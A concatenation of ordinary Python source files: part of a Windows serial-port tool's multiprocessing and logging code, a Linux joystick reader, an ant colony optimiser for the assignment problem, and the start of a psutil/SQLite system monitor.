while True: #ctrl quit status
try:
msg_data = ports_ctrl_Q.get()
#if not IN_FROZEN_STATE:
# print ('work',msg_data)
if msg_data[0] == 'QUIT':
ICOM_ports.ports_msg_proc(*msg_data)
break
ICOM_ports.ports_msg_proc(*msg_data)
pro_ok += 1
except Exception as e:
print ('work process exception',e)
pro_fail += 1
pass
print ('work process quit ok:%d,fail:%d\n'%(pro_ok,pro_fail))
os._exit(0)
def netsrv_process(pro_name,cur_instance_num,win_title,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_Q,pro_status):
import ICOM_netsrv
ICOM_netsrv.netsrv_set_vars(cur_instance_num,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_Q)
pro_ok = 0
pro_fail = 0
gui_Q.put(('READY','NETSRV',os.getpid()))
while True: #ctrl quit status
try:
msg_data = netsrv_ctrl_Q.get()
#print ('work',msg_data)
if msg_data[0] == 'QUIT':
pro_status[3] = 1
ICOM_netsrv.netsrv_msg_proc(*msg_data)
break
ICOM_netsrv.netsrv_msg_proc(*msg_data)
pro_ok += 1
except Exception as e:
print ('netsrv process exception',e,msg_data)
pro_fail += 1
pass
print ('netsrv process quit ok:%d,fail:%d\n'%(pro_ok,pro_fail))
os._exit(0)
def send_quit_message_to_process(ctrl_Q):
try:
ctrl_Q.put(('QUIT',100))
except Exception as e:
print ('send_quit_message_to_process err:%s'%e)
pass
def sys_tray_process(pro_name,cur_instance_num,win_title,share_list,tray_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status,trayTimerCallback):
from pywin32_sys_tray import win_sys_tray
sysTray = win_sys_tray()
sysTray.sys_tray_init(cur_instance_num,win_title,share_list,tray_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status)
sysTray.sys_tray_setup_extimer(1000,trayTimerCallback)
sysTray.sys_tray_start()
os._exit(0)
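# File-like queue: child processes redirect stdout/stderr into it and the main
# process periodically drains it into the log file (see record_file_log).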
class StdoutQueue(Queue):
def __init__(self, maxsize=0):
Queue.__init__(self,maxsize,ctx=multiprocessing)
def get_timestamp(self):
t = datetime.now()
return t.strftime("%Y-%m-%d %H:%M:%S.%f")
def write(self,msg):
if msg != '\r\n' and msg != '\n' and msg != ' ':
log_msg = '%s %s'%(self.get_timestamp(),msg)
else:
log_msg = msg
self.put(log_msg)
def error(self,msg):
log_msg = '%s %s\n'%(self.get_timestamp(),msg)
self.put(log_msg)
def debug(self,msg):
log_msg = '%s %s\n'%(self.get_timestamp(),msg)
self.put(log_msg)
def info(self,msg):
log_msg = '%s %s\n'%(self.get_timestamp(),msg)
self.put(log_msg)
def flush(self):
if sys.__stdout__:
sys.__stdout__.flush()
log_file = None
def open_file_log():
global log_file
try:
if is_in_frozen_state():
t = datetime.now()
f_name = os.path.abspath(os.path.join('log','icom_debug%d_%s.log'%(g_cur_instance_num,t.strftime("%M"))))
log_file = open(f_name,'w')
print ('start log:%s %s'%(f_name,log_file))
except:
pass
def record_file_log(log_Q, pro_status):
global log_file
if not log_file:
return
while True:
try:
msg_data = log_Q.get_nowait()
if msg_data:
log_file.write(msg_data)
else:
break
except Exception as e:
break
def record_file_log_flush():
if log_file:
log_file.flush()
def close_file_log(pro_status):
if log_file:
t = datetime.now()
log_file.write('%s pro_status:%s\n'%(t.strftime("%Y-%m-%d %H:%M:%S %f"),pro_status[:]))
log_file.flush()
log_file.close()
def is_module_exists(module_name):
_is_exists = False
try:
__import__(module_name)
_is_exists = True
except ImportError:
pass
return _is_exists
def is_in_frozen_state():
if hasattr(sys, 'frozen') and hasattr(sys, '_MEIPASS'):
global IN_FROZEN_STATE
IN_FROZEN_STATE = True
return sys._MEIPASS
return None
def get_app_title(instance_num):
app_tile = 'iCOM for Windows'
if os.name.upper() != 'NT':
app_tile = 'iCOM for %s'%os.name
if instance_num > 0:
app_tile = '%s (%d)'%(app_tile,instance_num)
return app_tile
def get_instance_num():
instance_num = 0
try:
instance_num = int(win_instance.get_instance_num(10, 'py-instance-num'))
print ('instance_num',instance_num)
if instance_num > 0:
instance_num = instance_num - 1
except Exception as e:
print ('get_instance_num err:%s'%e)
pass
return instance_num
frozen_dir_clean = False
frozen_dirs_list = []
import shutil
def get_frozen_tem_dir_prefix(cur_tmp_dir):
base_name = os.path.basename(cur_tmp_dir)
_prefix = ''.join([_ for _ in base_name if not _.isdigit()])
return _prefix
def get_forzen_dirs():
frozen_dir = is_in_frozen_state()
if frozen_dir:
frozen_parent_dir = os.path.abspath(os.path.join(frozen_dir,'..'))
frozen_dir = frozen_dir[0:-1] if frozen_dir[-1] == os.sep else frozen_dir
frozen_prefix = get_frozen_tem_dir_prefix(frozen_dir)
return frozen_dir,frozen_parent_dir,frozen_prefix
return None,None,None
def clean_frozen_tmp_dir(cur_tmp_dir,frozen_parent_dir,frozen_prefix,cur_exe):
global frozen_dir_clean
global frozen_dirs_list
if frozen_dir_clean is True:
return
try:
if not frozen_dirs_list:
dir_list = os.listdir(frozen_parent_dir)
frozen_dirs_list = [os.path.join(frozen_parent_dir,x) for x in dir_list if x != cur_tmp_dir and x.startswith(frozen_prefix) ]
if frozen_dirs_list:
st_time_sec = os.stat(frozen_dirs_list[-1]).st_ctime
today = datetime.today()
st_time = datetime.fromtimestamp(st_time_sec)
pass_time = today - st_time
cur_del_dir = frozen_dirs_list[-1]
del frozen_dirs_list[-1]
if not frozen_dirs_list:
frozen_dir_clean = True
if pass_time.days >= 3 and os.path.exists(os.path.join(cur_del_dir,'%s.manifest'%cur_exe)):
os.remove(os.path.join(cur_del_dir,'_multiprocessing.pyd'))
os.remove(os.path.join(cur_del_dir,'_ctypes.pyd'))
shutil.rmtree(cur_del_dir)
except Exception as e:
print ('clean tmp file err:%s\n'%e)
pass
return
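# Data queue towards the GUI process: it batches data messages and signals them
# via a separate sync control queue (or a Windows message) so the GUI side can
# apply flow control instead of being flooded.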
class win_gui_Queue(Queue):
__SAMPLE_SIZE = 4
__MAX_MSG_RATE_THREDHOLD = 80
__sync_flow_ctrl_count = 0
__flow_ctrl_interger = 0
__flow_ctrl_remainder = 0
__msg_count = 0
__real_proc_data_msg_count = 0
__msg_reminder_count = 0
__data_queue_msg_count = 0
__nodata_timeout_count = 0
sync_ctrl_Q = None
__send_lock = dummyLock()
def __init__(self,maxsize=0):
Queue.__init__(self,maxsize,ctx=multiprocessing)
self.__timer_ctrl_func = None
self._flow_ctrl = icom_flow_ctrl.flow_ctrl(current_thread().ident)
self._win_msg = None
self.__buffer_msg = []
self._flow_ctrl.set_timer_req_function(self.req_timer_ctrl_Q_cmd)
self._flow_ctrl.set_flow_ctrl_req_function(self.req_flow_ctrl_Q_cmd)
self._flow_ctrl.set_enable(True)
def set_win_pid(self,win_pid):
self._win_msg = icom_win_msg.win_msg(win_pid)
def set_timer_ctrl_function(self,timer_ctrl_func):
self.__timer_ctrl_func = timer_ctrl_func
def req_timer_ctrl_Q_cmd(self,cmd,timer_id,timer_len):
if self.__timer_ctrl_func:
self.__timer_ctrl_func(cmd,timer_id,timer_len)
def req_flow_ctrl_Q_cmd(self,cmd,ctrl_msg_count):
self.flow_ctrl(ctrl_msg_count)
def set_sync_ctrl_Q(self,sync_ctrl_Q):
win_gui_Queue.sync_ctrl_Q = sync_ctrl_Q
win_gui_Queue.__sync_flow_ctrl_count = win_gui_Queue.__SAMPLE_SIZE
win_gui_Queue.__msg_count = 0
win_gui_Queue.__msg_reminder_count = 0
def flow_ctrl(self,msg_count):
        # Collect and group data-message counts (in units of 1/4 of the sample size):
        # e.g. 6 means group 6/4 (1.5) packets before sending a sync ctrl message;
        # <= 4 means do not group data messages.
#win_gui_Queue.__send_lock.acquire()
if msg_count > 4:
interger = msg_count//win_gui_Queue.__SAMPLE_SIZE
reminder = msg_count%win_gui_Queue.__SAMPLE_SIZE
if reminder > 0:
win_gui_Queue.__flow_ctrl_interger = interger + 1
new_reminder = win_gui_Queue.__SAMPLE_SIZE - reminder
win_gui_Queue.__flow_ctrl_remainder = (win_gui_Queue.__flow_ctrl_interger * msg_count + reminder//2)//new_reminder
else:
win_gui_Queue.__flow_ctrl_interger = interger
win_gui_Queue.__flow_ctrl_remainder = 0
win_gui_Queue.__sync_flow_ctrl_count = msg_count #enable flow ctrl now
print ('flow-ctrl set:%d,%d,%d,%d'%(msg_count,win_gui_Queue.__flow_ctrl_interger,win_gui_Queue.__flow_ctrl_remainder,win_gui_Queue.__msg_count))
else:
win_gui_Queue.__sync_flow_ctrl_count = win_gui_Queue.__SAMPLE_SIZE
win_gui_Queue.__flow_ctrl_interger = 0
win_gui_Queue.__flow_ctrl_remainder = 0
print ('flow-ctrl set',msg_count)
cur_msg_count = win_gui_Queue.__msg_count
#win_gui_Queue.__send_lock.release()
#self.do_send_ctrl_msg(ICOM_CTRL_MSG.ID_FLOW_CTRL_CNF,msg_count,cur_msg_count)
self._flow_ctrl.process_flow_ctrl(ICOM_CTRL_MSG.ID_FLOW_CTRL_CNF, msg_count,cur_msg_count, 0, 0)
def get_flow_ctrl_info(self):
return win_gui_Queue.__sync_flow_ctrl_count,win_gui_Queue.__flow_ctrl_interger,win_gui_Queue.__flow_ctrl_remainder
def do_send_ctrl_msg(self,msg_int_type,msg_int_param1=None,msg_int_param2=None,msg_int_param3=None,msg_int_param4=None):
if not win_gui_Queue.sync_ctrl_Q:
return
if win_gui_Queue.sync_ctrl_Q.full():
print('self.sync_ctrl_Q full full full')
return
msg_para_list = (msg_int_type,msg_int_param1)
if msg_int_param4:
msg_para_list = (msg_int_type,msg_int_param1,msg_int_param2,msg_int_param3,msg_int_param4)
elif msg_int_param3:
msg_int_param4 = 0
msg_para_list = (msg_int_type,msg_int_param1,msg_int_param2,msg_int_param3)
elif msg_int_param2:
msg_int_param3 = msg_int_param4 = 0
msg_para_list = (msg_int_type,msg_int_param1,msg_int_param2)
elif msg_int_param1:
msg_int_param2 = msg_int_param3 = msg_int_param4 = 0
else:
msg_int_param1 = msg_int_param2 = msg_int_param3 = msg_int_param4 = 0
msg_para_list = (msg_int_type,)
win_gui_Queue.__send_lock.acquire()
data_queue_msg_count = self.__data_queue_msg_count
if msg_int_type == ICOM_CTRL_MSG.ID_TIMER_TIMEOUT:
win_gui_Queue.__real_proc_data_msg_count = 0
else:
win_gui_Queue.__real_proc_data_msg_count += 1
need_continue_proc = self._flow_ctrl.process_flow_ctrl(msg_int_type, msg_int_param1, msg_int_param2, msg_int_param3, msg_int_param4)
win_gui_Queue.__send_lock.release()
if need_continue_proc is False:
#print ('nd',msg_int_type)
return
if data_queue_msg_count <= 0 and msg_int_type == ICOM_CTRL_MSG.ID_SEND_DATA_CNF_OK:
#print ('cd')
return
if msg_int_type == ICOM_CTRL_MSG.ID_PROC_QUIT_MSG or msg_int_type == ICOM_CTRL_MSG.ID_TIMER_TIMEOUT:
if not self._win_msg or self._win_msg.send_sync_msg(msg_para_list) is False:
return win_gui_Queue.sync_ctrl_Q.put(msg_para_list)
else:
return win_gui_Queue.sync_ctrl_Q.put(msg_para_list)
def send_data_sync_msg(self,msg_obj=None,msg_type=None,force_sync=None):
need_send_ctrl_msg = False
win_gui_Queue.__send_lock.acquire()
win_gui_Queue.__msg_count += 1
win_gui_Queue.__msg_reminder_count += 1
data_msg_cnt = win_gui_Queue.__sync_flow_ctrl_count
if force_sync is True:
need_send_ctrl_msg = True
data_msg_cnt = (win_gui_Queue.__msg_count + win_gui_Queue.__msg_reminder_count)*win_gui_Queue.__SAMPLE_SIZE//2
win_gui_Queue.__msg_count = 0
win_gui_Queue.__msg_reminder_count = 0
elif win_gui_Queue.__msg_count >= win_gui_Queue.__flow_ctrl_interger:
need_send_ctrl_msg = True
win_gui_Queue.__msg_count = 0
elif win_gui_Queue.__msg_reminder_count >= win_gui_Queue.__flow_ctrl_remainder > win_gui_Queue.__flow_ctrl_interger:
need_send_ctrl_msg = True
win_gui_Queue.__msg_reminder_count = 0
if msg_obj:
self.__data_queue_msg_count += 1
if self.__buffer_msg:
self.__buffer_msg.append(msg_obj)
elif win_gui_Queue.__sync_flow_ctrl_count >= win_gui_Queue.__SAMPLE_SIZE *5:
self.__buffer_msg.append(msg_obj)
else:
Queue.put(self,msg_obj)
if need_send_ctrl_msg is True:
if self.__buffer_msg:
Queue.put(self,self.__buffer_msg)
self.__buffer_msg = []
self.__data_queue_msg_count = 0
elif len(self.__buffer_msg) > 3:
Queue.put(self,self.__buffer_msg)
self.__buffer_msg = []
win_gui_Queue.__send_lock.release()
if need_send_ctrl_msg is True:
self.do_send_ctrl_msg(msg_type if msg_type else ICOM_CTRL_MSG.ID_PROC_DATA_MSG,data_msg_cnt)
def __put(self, obj, block=True, timeout=None):
if win_gui_Queue.__sync_flow_ctrl_count <= win_gui_Queue.__SAMPLE_SIZE:
Queue.put(self,obj, block, timeout)
if win_gui_Queue.__real_proc_data_msg_count > win_gui_Queue.__MAX_MSG_RATE_THREDHOLD:
self.flow_ctrl(win_gui_Queue.__real_proc_data_msg_count*win_gui_Queue.__SAMPLE_SIZE//(win_gui_Queue.__MAX_MSG_RATE_THREDHOLD))
return self.do_send_ctrl_msg(ICOM_CTRL_MSG.ID_PROC_DATA_MSG, win_gui_Queue.__SAMPLE_SIZE)
self.send_data_sync_msg(obj)
def put(self, obj, block=True, timeout=None):
self.__put(obj, block, timeout)
def do_send_quit_msg(self):
self.do_send_ctrl_msg(ICOM_CTRL_MSG.ID_PROC_QUIT_MSG)
def do_sync(self):
self.send_data_sync_msg(None,ICOM_CTRL_MSG.ID_FORCE_SYNC_MSG,True)
def do_timer_out(self,timer_id,timer_len):
return self.do_send_ctrl_msg(ICOM_CTRL_MSG.ID_TIMER_TIMEOUT,timer_id,timer_len)
def do_cmd_cnf(self,cmd_type, port_name, result_code, result_str=None):
if result_code == 0 and (cmd_type == "SI" or cmd_type == "S"):
self.send_data_sync_msg(None,ICOM_CTRL_MSG.ID_SEND_DATA_CNF_OK)
else:
self.__put(("C",cmd_type,port_name,result_code,result_str))
def put_nowait(self, obj):
self.send_data_sync_msg(obj)
def set_app_title(self,app_title):
pass
def icom_main(argv):
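    # Process layout: the GUI runs in its own multiprocessing.Process, the ports
    # worker (and optional net server) run as threads via multiprocessing.dummy,
    # and the system-tray loop runs in this main process.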
global g_cur_instance_num
g_cur_instance_num = cur_instance_num = get_instance_num()
#add instance
win_instance.pyi_add_instance_num()
win_title = get_app_title(g_cur_instance_num)
process_work = None
process_tray = None
pro_status = multiprocessing.Array('i', [0 for i in range(8)])
current_process = multiprocessing.current_process()
print ('current_process',current_process.pid,current_process.name)
ports_ctrl_Q = multiprocessing.Queue()
tray_ctrl_Q = multiprocessing.Queue(maxsize=1)
gui_sync_ctrl_Q = multiprocessing.Queue()
gui_data_Q = win_gui_Queue()
gui_data_Q.set_sync_ctrl_Q(gui_sync_ctrl_Q)
manager_Q = multiprocessing.Queue()
netsrv_ctrl_Q = None
if is_module_exists('ICOM_netsrv'):
netsrv_ctrl_Q = multiprocessing.Queue()
__stdout = StdoutQueue()
process_netsrv = None
process_gui = multiprocessing.Process(target=gui_process,name='GUI',
args=('main-gui',cur_instance_num,win_title,manager_Q,ports_ctrl_Q,tray_ctrl_Q,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status,__stdout))
process_gui.start()
gui_data_Q.set_win_pid(process_gui.pid)
gui_data_Q.set_timer_ctrl_function(lambda cmd,timer_id,timer_len:ports_ctrl_Q.put((cmd,timer_id,timer_len)))
#process_tray = dummyProcess(target=sys_tray_process,name='TRAY', args=('sys-tray',cur_instance_num,win_title,manager_Q,tray_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status))
process_work = dummyProcess(target=work_ports_process,name='PORTS', args=('work-ports',cur_instance_num,win_title,manager_Q,ports_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q))
if netsrv_ctrl_Q:
process_netsrv = dummyProcess(target=netsrv_process,name='NETSRV', args=('net-srv',cur_instance_num,win_title,netsrv_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status))
print ('start_process')
#process_tray.setDaemon(True)
#process_tray.start()
process_work.setDaemon(True)
process_work.start()
#if process_netsrv:
# process_netsrv.setDaemon(True)
# process_netsrv.start()
#current_process.daemon = True
open_file_log()
if is_in_frozen_state():
sys.stdout = __stdout
sys.stderr = __stdout
print ('gui',process_gui.pid)
#print ('tray',process_tray.pid)
#print ('ports',process_work.pid)
#if process_netsrv:
# print ('netsrv',process_netsrv.pid)
frozen_dir,frozen_parent_dir,frozen_prefix = get_forzen_dirs()
def tray_periel_callback(lparam, loop_count):
cur_exe = os.path.basename(argv[0] if len(argv) > 0 else 'ICOM.exe')
if not process_gui.is_alive() or 0 != pro_status[0]:
send_quit_message_to_process(tray_ctrl_Q)
return 0
try:
#delay 3 sec to startup netsrv process
if NET_SRV_PROCESS_DELAY_START == loop_count and isinstance(process_netsrv,(multiprocessing.Process,dummyProcess)):
print ('process_netsrv start')
process_netsrv.setDaemon(True)
process_netsrv.start()
#print ('netsrv',process_netsrv.pid)
#print ('active_children',multiprocessing.active_children())
#print ('process_work need restart',ports_ctrl_Q.__dict__)
if not isinstance(process_work,(multiprocessing.Process,dummyProcess)) or not process_work.is_alive():
print ('process_work quit:%d'%loop_count)
if (NET_SRV_PROCESS_DELAY_START < loop_count) and process_netsrv and (not isinstance(process_netsrv,(multiprocessing.Process,dummyProcess)) or not process_netsrv.is_alive()):
print ('process_netsrv quit:%d'%loop_count)
if frozen_dir and cur_instance_num == 0:
clean_frozen_tmp_dir(frozen_dir,frozen_parent_dir,frozen_prefix,cur_exe)
record_file_log(__stdout,pro_status)
if loop_count % 10 == 0:
record_file_log_flush()
#loop_count = loop_count + 1 if loop_count < 30000 else NET_SRV_PROCESS_DELAY_START + 1
except Exception as e:
print ('check exception %s'%e)
pass
return loop_count + 1 if loop_count < 30000 else NET_SRV_PROCESS_DELAY_START + 1
sys_tray_process('sys-tray',cur_instance_num,win_title,manager_Q,tray_ctrl_Q,gui_sync_ctrl_Q,gui_data_Q,pro_status,tray_periel_callback)
try:
win_instance.pyi_release_instance_num()
gui_exit_code = process_gui.exitcode
print ('process_gui.exitcode',gui_exit_code)
if 0:
send_quit_message_to_process(ctrl_Q)
print ('process ctrl_Q ok')
#send_quit_message_to_process(tray_ctrl_Q)
#print ('process tray_ctrl_Q ok')
if netsrv_ctrl_Q:
send_quit_message_to_process(netsrv_ctrl_Q)
print ('process netsrv_ctrl_Q ok')
process_gui.join(timeout = 3)
print ('process_gui.ok')
#if process_tray and isinstance(process_tray,(multiprocessing.Process,dummyProcess)):
# if process_tray.is_alive() and hasattr(process_tray,'terminate'):
# process_tray.terminate()
# print ('process_tray.exitcode',process_tray.exitcode)
# process_tray.join(timeout = 3)
if process_work and isinstance(process_work,(multiprocessing.Process,dummyProcess)):
            if process_work.is_alive() and hasattr(process_work,'terminate'):
process_work.terminate()
print ('process_work.exitcode',process_work.exitcode)
process_work.join(timeout = 3)
        if process_netsrv and isinstance(process_netsrv,(multiprocessing.Process,dummyProcess)) and hasattr(process_netsrv,'terminate'):
process_netsrv.terminate()
print ('process_netsrv.exitcode',process_netsrv.exitcode)
process_netsrv.join(timeout = 3)
except Exception as e:
print ('terminate exception %s'%e)
pass
print ('process share status %s'%pro_status[:])
record_file_log(__stdout,pro_status)
print ('record log.ok')
close_file_log(pro_status)
print ('all quit.ok')
return 0
|
joystick.py
|
#
# Copyright 2016-2017 Games Creators Club
#
# MIT License
#
import time
import array
import struct
import threading
from fcntl import ioctl
disabled = False
# We'll store the states here.
axis_states = {}
button_states = {}
# These constants were borrowed from linux/input.h
axis_names = {
0x00: 'x',
0x01: 'y',
0x02: 'z',
0x03: 'rx',
0x04: 'ry',
0x05: 'rz',
0x06: 'trottle',
0x07: 'rudder',
0x08: 'wheel',
0x09: 'gas',
0x0a: 'brake',
0x10: 'hat0x',
0x11: 'hat0y',
0x12: 'hat1x',
0x13: 'hat1y',
0x14: 'hat2x',
0x15: 'hat2y',
0x16: 'hat3x',
0x17: 'hat3y',
0x18: 'pressure',
0x19: 'distance',
0x1a: 'tilt_x',
0x1b: 'tilt_y',
0x1c: 'tool_width',
0x20: 'volume',
0x28: 'misc',
}
button_names = {
0x120: 'trigger',
0x121: 'thumb',
0x122: 'thumb2',
0x123: 'top',
0x124: 'top2',
0x125: 'pinkie',
0x126: 'base',
0x127: 'base2',
0x128: 'base3',
0x129: 'base4',
0x12a: 'base5',
0x12b: 'base6',
0x12f: 'dead',
0x130: 'a',
0x131: 'b',
0x132: 'c',
0x133: 'x',
0x134: 'y',
0x135: 'z',
0x136: 'tl',
0x137: 'tr',
0x138: 'tl2',
0x139: 'tr2',
0x13a: 'select',
0x13b: 'start',
0x13c: 'mode',
0x13d: 'thumbl',
0x13e: 'thumbr',
0x220: 'dpad_up',
0x221: 'dpad_down',
0x222: 'dpad_left',
0x223: 'dpad_right',
    # Xbox 360 controller uses these codes.
0x2c0: 'dpad_left',
0x2c1: 'dpad_right',
0x2c2: 'dpad_up',
0x2c3: 'dpad_down',
}
axis_map = []
button_map = []
# Open the joystick device.
fn = '/dev/input/js0'
# print('Opening %s...' % fn)
jsdev = open(fn, 'rb')
# Get the device name.
# buf = bytearray(63)
# buf = array.array('c', ['\0'] * 64)
buf = array.array('b', [0] * 64)
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
js_name = buf.tobytes()
# print('Device name: %s' % js_name)
# Get number of axes and buttons.
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(jsdev, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
# Get the axis map.
buf = array.array('B', [0] * 0x40)
ioctl(jsdev, 0x80406a32, buf) # JSIOCGAXMAP
for axis in buf[:num_axes]:
axis_name = axis_names.get(axis, 'unknown(0x%02x)' % axis)
axis_map.append(axis_name)
axis_states[axis_name] = 0.0
# Get the button map.
buf = array.array('H', [0] * 200)
ioctl(jsdev, 0x80406a34, buf) # JSIOCGBTNMAP
for btn in buf[:num_buttons]:
btn_name = button_names.get(btn, 'unknown(0x%03x)' % btn)
button_map.append(btn_name)
button_states[btn_name] = 0
# print '%d axes found: %s' % (num_axes, ', '.join(axis_map))
# print '%d buttons found: %s' % (num_buttons, ', '.join(button_map))
def readEvents():
evbuf = jsdev.read(8)
if evbuf:
time, value, event_type, number = struct.unpack('IhBB', evbuf)
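        # The 8-byte read matches the kernel's struct js_event: a 32-bit
        # timestamp in milliseconds, a signed 16-bit value, and two unsigned
        # bytes for the event type and the axis/button number.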
# print("Got event " + str(value) + "," + str(event_type) + "," + str(number))
# if type & 0x80:
# print "(initial)",
if event_type & 0x01:
button = button_map[number]
if button:
button_states[button] = value
# if value:
# print "%s pressed" % (button)
# else:
# print "%s released" % (button)
if event_type & 0x02:
selected_axis = axis_map[number]
if selected_axis:
fvalue = value / 32767.0
axis_states[selected_axis] = fvalue
def readEventsLoop():
while True:
if not disabled:
readEvents()
else:
time.sleep(0.2)
def startNewThread():
thread = threading.Thread(target=readEventsLoop, args=())
thread.daemon = True
thread.start()
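# Usage sketch (not part of the original module): start the background reader
# thread and poll the shared state dictionaries. It assumes the connected
# device reports an 'x' and a 'y' axis; adjust the keys to whatever ends up in
# axis_map for your controller.
if __name__ == '__main__':
    startNewThread()
    while True:
        print("x=%+.2f  y=%+.2f  buttons=%s" %
              (axis_states.get('x', 0.0), axis_states.get('y', 0.0), button_states))
        time.sleep(0.5)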
|
main.py
|
import os
import random
import multiprocessing as mp
import numpy
import time
from job3 import *
P_COUNT = os.cpu_count()
PRINT_EACH_ITERATION = True
PRINT_COST_CALCULATION = False
class AP:
def __init__(self, path: str):
with open(path) as f:
self.costs = list(map(lambda line: list(map(int, line.split())), f.readlines()))
self.count = len(self.costs)
        # Initialise pheromone levels inversely proportional to the assignment costs.
        self.pheromones = [[1 / self.costs[i][j] for j in range(self.count)] for i in range(self.count)]
self.colony = [Ant(self) for _ in range(COLONY_POPULATION)]
self.total_best_ant_cost = None
self.total_best_ant_assignments = None
def step(self, k):
for ant in self.colony:
ant.assign(k)
def evaporate(self):
for i in range(self.count):
for j in range(self.count):
self.pheromones[i][j] *= (1 - EVAPORATION_PARAMETER)
    def secrete_pheromones(self):
for ant in self.colony:
ant.calculate_cost()
delta = 1 / ant.cost
for i in range(self.count):
j = ant.assignments[i]
self.pheromones[i][j] += delta
if self.total_best_ant_cost is not None:
e_delta = ELITISM / self.total_best_ant_cost
for i in range(self.count):
j = self.total_best_ant_assignments[i]
self.pheromones[i][j] += e_delta
def iterate(self):
if PARALLEL:
            def chunk_assign(indices, ants, rd):
for i in range(len(indices)):
for k in range(self.count):
ants[i].assign(k)
rd[indices[i]] = ants[i].assignments
chunks = numpy.array_split(range(len(self.colony)), P_COUNT)
manager = mp.Manager()
rd = manager.dict()
processes = [
                mp.Process(target=chunk_assign, args=(chunk, self.colony[chunk[0]:chunk[-1] + 1], rd))
for chunk in chunks
]
for p in processes:
p.start()
for p in processes:
p.join()
for i in range(len(self.colony)):
self.colony[i].assignments = rd[i]
else:
for k in range(self.count):
self.step(k)
self.evaporate()
        self.secrete_pheromones()
def solve(self):
i = 0
stagnancy = 0
while True:
self.iterate()
i += 1
new_best_ant = min(self.colony, key=lambda ant: ant.cost)
if self.total_best_ant_cost is not None:
if self.total_best_ant_cost - new_best_ant.cost < IMPROVEMENT_THRESHOLD:
stagnancy += 1
if stagnancy >= STAGNANCY_THRESHOLD:
break
else:
stagnancy = 0
if self.total_best_ant_cost is None or new_best_ant.cost < self.total_best_ant_cost:
self.total_best_ant_cost = new_best_ant.cost
self.total_best_ant_assignments = new_best_ant.assignments.copy()
if PRINT_EACH_ITERATION:
print(f'Iteration {i}: Total best is {self.total_best_ant_cost} while iteration best is {new_best_ant.cost}')
return [self.total_best_ant_cost, self.total_best_ant_assignments]
class Ant:
def __init__(self, ap: AP):
self.ap = ap
self.assignments = [-1] * self.ap.count
self.cost = None
def assign(self, k):
weights = [
(self.ap.pheromones[k][i] ** ALPHA) * ((1 / self.ap.costs[k][i]) ** BETA)
if i not in self.assignments[:k] else 0
for i in range(self.ap.count)
]
self.assignments[k] = random.choices(range(self.ap.count), weights=weights, k=1)[0]
def calculate_cost(self):
self.cost = sum([self.ap.costs[i][self.assignments[i]] for i in range(self.ap.count)])
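# Worked example of the transition rule above (illustrative numbers, not taken
# from job3): with ALPHA=1 and BETA=2, pheromone levels [0.5, 0.2] and costs
# [10, 5] for the two still-unassigned tasks give weights 0.5*(1/10)**2 = 0.005
# and 0.2*(1/5)**2 = 0.008, so random.choices picks the second task with
# probability 0.008 / (0.005 + 0.008) ≈ 0.62.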
ap = AP(FILE_PATH)
t_start = time.time()
answer = ap.solve()
t_end = time.time()
print(f'Took: {t_end - t_start:.5f} seconds')
print(f'Cost: {answer[0]}')
print('Assignments:', end=' ')
print(answer[1])
if PRINT_COST_CALCULATION:
print('+'.join([str(ap.costs[i][answer[1][i]]) for i in range(len(answer[1]))]) + '=' + str(answer[0]))
|
capture.py
|
#!/usr/bin/env python
import os
import sys
import time
import string
import sqlite3
import subprocess
from multiprocessing import Process
import psutil as ps
db1_host = "localhost"
db_files = {"monitor": { "db_filename": "/opt/sys_monitor/db/monitor.db",
"schema_filename": "/opt/sys_monitor/db/sql_schema.sql"},
"db1_qry": { "db_filename": "/opt/sys_monitor/db/db1_qry-monitor.db",
"schema_filename": "/opt/sys_monitor/db/db1_qry-sql_schema.sql"}
}
for x in db_files:
db_file = db_files[x]["db_filename"]
schema_file = db_files[x]["schema_filename"]
db_is_new = not os.path.exists(db_file)
with sqlite3.connect(db_file) as conn:
if db_is_new:
            print('Creating schema')
with open(schema_file, 'rt') as f:
schema = f.read()
conn.executescript(schema)
#conn.commit()
#conn.close()
else:
            print('Database %s exists, assume schema %s does, too.' % (db_file, schema_file))
#sys.exit(1)
# sleep at first to start stats
time.sleep(1)
def qryTime():
start_time = int(time.time())
subprocess.call(['/opt/sys_monitor/conf/test_db1_apps.sh', db1_host], stdout=subprocess.PIPE, shell=False, stderr=subprocess.PIPE)
time.sleep(5)
end_time = int(time.time())
date_time = end_time
db1_qry = end_time - start_time
if db1_qry < 3:
time.sleep(60)
rowid = 1
conn = sqlite3.connect('/opt/sys_monitor/db/db1_qry-monitor.db')
cursor = conn.cursor()
t = [rowid, date_time, db1_qry ]
conn.execute('INSERT OR REPLACE INTO db1Qry values (?,?,?)', t)
#print t
conn.commit()
def statTime():
disks1 = ps.disk_io_counters(perdisk=True)
dsk1_0b = disks1["sd1"]
dsk1_0c = disks1["sd2"]
net1 = ps.net_io_counters(pernic=True)
net1_all = net1["net0"]
time.sleep(2)
date_time = int(time.time())
cpu = ps.cpu_times_percent()
mem = ps.virtual_memory()
swap = ps.swap_memory()
disks2 = ps.disk_io_counters(perdisk=True)
net2 = ps.net_io_counters(pernic=True)
cpu_usr = int(round(cpu[0],3))
cpu_sys = int(round(cpu[1],3))
cpu_tot = int(round(cpu[0] + cpu[1],3))
# Conversion below - (0, 'B'), (10, 'KB'),(20, 'MB'),(30, 'GB'),(40, 'TB'), (50, 'PB')
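    # e.g. 8589934592 bytes (8 GiB) / 2**20 = 8192, i.e. memory values below
    # are stored as MiB (illustrative figure).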
mem_usd = int(round(mem[3] / 2 ** 20))
mem_tot = int(round(mem[0] / 2 ** 20))
swp_usd = int(round(swap[1] / 2 ** 20))
swp_tot = int(round(swap[0] / 2 ** 20))
dsk2_0b = disks2["sd1"]
dsk2_0c = disks2["sd2"]
dsk_0b_rop = (dsk2_0b[0] - dsk1_0b[0])
dsk_0b_wop = (dsk2_0b[1] - dsk1_0b[1])
